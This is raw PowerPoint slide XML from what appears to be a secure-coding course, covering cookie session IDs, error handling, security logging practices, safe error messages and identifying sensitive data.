          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1447800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2227582380"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3352800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2354953793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4001184">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3235437500"/>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Benefits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Disadvantages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313326616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Session ID in a cookie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Careful use of persistent and session type cookies can be used to regulate access to the web application over time.</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Various options are available for controlling session ID timeouts.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Session information is unlikely to be recorded by intermediary devices.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Cookie functionality is built into most browsers, so no special coding is required to ensure session ID information is embedded within the pages served to the client browser.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Will not work for users who have disabled cookies.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Cookies that persist beyond a session can be easily copied to other systems.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Cookies are sent along with every document requested by the browser within the domain defined by SET-COOKIE.</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Due to limits in cookie size, complex information can't be stored.</a:t>
                      </a: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07404794"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29193513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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Error Handling (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310327" y="1302039"/>
            <a:ext cx="7491747" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the event that a fatal error requires exiting the module or application, ensure that all affected values and ongoing transactions are restored to a secure state.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that errors in APIs and services are traceable, so the developer can determine where the error occurred. (It might occur in the calling function, for example.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not allow exceptions to go unhandled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you write browser-based code, do not allow any exceptions to reach the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be careful when reusing code examples in your own code, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which often don’t provide comprehensive error handling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that sensitive application, service, or OS metadata, architectural, or configuration details, are not leaked in exception details.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for error handl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550491" y="1938612"/>
            <a:ext cx="495478" cy="592679"/>
            <a:chOff x="341925" y="2514600"/>
            <a:chExt cx="764437" cy="914400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 7"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="341925" y="25146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1925" y="27432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3400" y="27432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3400" y="29718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3887" y="29718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33887" y="32004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3400" y="3200400"/>
              <a:ext cx="0" cy="228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33400" y="3429000"/>
              <a:ext cx="57247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2" name="Picture 21" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D28E5E-C504-4441-AC82-A98582D3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92" y="5075476"/>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25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og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71" y="1774578"/>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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Logging (Slide 1 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310327" y="1302040"/>
            <a:ext cx="7491747" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maintain logs on a trusted system, such as a server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect logs from attackers. Make sure attackers cannot view them or alter them. (Due to compliance, you may be required to protect them.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log both success and failure of specified security events.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure log entries that document input data provided by users (untrusted data) will not execute as code within the log viewing interface.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include information that will be helpful to security analysts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Precise time of the event (in UTC format).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name or ID of the process that logged the event.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An informative (if brief) description of the event.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name or code for the type of event being logged.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not store sensitive information in logs, including unnecessary system details, session identifiers, or passwords.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for error handl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hecklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF6C7479-8835-4A6F-BC51-1EF58B623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05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og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71" y="1774578"/>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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Logging (Slide 2 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945971" y="1302861"/>
            <a:ext cx="7963874" cy="5454870"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log the types of events that will be helpful to security analysts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Potential security violations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to protected resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session management failures, such as invalid or expired session tokens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication attempts, including the user and whether the attempt failed or succeeded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User opt-ins, such as terms of use, consent to use personal data, email lists, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input validation failures, such as unacceptable length, characters, and encodings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output validation failures, such as invalid data encoding and database record set mismatch.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application and related systems startup and shutdown.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data file reads, including what portion of data was read, and who read it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data file modifications, including what portion of data was modified, and who modified it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for error handl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hecklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A6E7923-F5FF-4A37-88CB-F209A5EC6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042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og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71" y="1774578"/>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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Logging (Slide 3 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="939440" y="1266099"/>
            <a:ext cx="7963874" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log the types of events that will be helpful to security analysts (cont.):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data file deletion, including what portion of data was deleted, and who deleted it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data attribute modification, such as access permissions, labels, ownership, including what data was affected, and who modified it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General errors and system events, such as system exceptions, connection and performance issues, errors reported from external services, file system errors, backend TLS connection failures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Performance of any administrative tasks, including changes to settings and configuration, user account management, changes to privileges, enabling or disabling logging or debugging features, viewing user information, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network communication, including attempts to use unauthorized ports </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and protocols.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of any high risk functionality, such as access to payment cardholder </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>data, data import and export, file uploads, and so forth.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for error handl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hecklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A6E7923-F5FF-4A37-88CB-F209A5EC6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58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og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71" y="1774578"/>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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Logging (Slide 4 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310327" y="1302040"/>
            <a:ext cx="7491747" cy="4946360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Centralize your logging functions in a secure module that handles logs in a consistent way:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses a cryptographic hash function to validate the integrity of log entries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables new records to be added, but prevents older records from revision or deletion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses a standard naming convention for log files, to facilitate sorting and searching.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implements functions to automatically verify on a regular basis that logging is still active.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Restrict unauthorized individuals from accessing logs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Synchronize all logging components with a timeserver that has been hardened and isolated from other services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that a mechanism exists to conduct log analysis and that logs are written in a readable format.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make secure offsite backups of logs on a regular basis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delete and dispose of log files properly and in accordance </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with company policy and compliance regulations.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for error handl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hecklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{286E7F8F-B369-4DBB-894C-318453D16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083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abort retry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55571"/>
            <a:ext cx="2483416" cy="111100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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Display Error Messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3124200"/>
            <a:ext cx="7125674" cy="3098799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide information that is appropriate for the audience who will see the error messages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not provide information that might be useful to an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In production, disable detailed exception information that will confuse users and may leak useful information to attackers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In custom error pages on websites, provide an email link for user feedback.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for error handl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977543" cy="9775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38600" y="1853843"/>
            <a:ext cx="1905000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D6D3CE"/>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TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4046220" y="1797824"/>
            <a:ext cx="1905000" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Be careful of the information you provide here!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3588668" y="1542752"/>
            <a:ext cx="1905000" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F925EEA-3D09-4743-9E39-B2090B32F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62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76</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Often, developers do not account for all the things that might cause a function to fail. Unhandled errors can lead to security problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are writing a function to produce a hash value based on a text file provided to the function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will improve the error handling in this function to account for more of the things that might go wrong.</a:t>
            </a:r>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Activity: Reviewing Error Handling</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054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77</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You will examine how the error handling routines can be improved in the Python code you just examined.</a:t>
            </a:r>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Activity: Improving Error Handling</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5122"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976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E71345-B5F1-4757-BF16-F6A4F6176624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>78</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FE71FCC5-48F6-4950-94D7-4F76DC057E47}"/>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D112D678-FF0F-4C30-AAE0-3B161B171853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Sensitive Data and Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4093075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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It may not always be obvious what types of data are sensitive and need protection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In design and development, work with stakeholders to identify affected data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personally Identifiable Information (PII)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protected Health Information (PHI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intellectual Property (IP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sales and Operational Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IT Security Information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Financial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Export Controlled Research</a:t>
            </a:r>
          </a:p>
          <a:p>
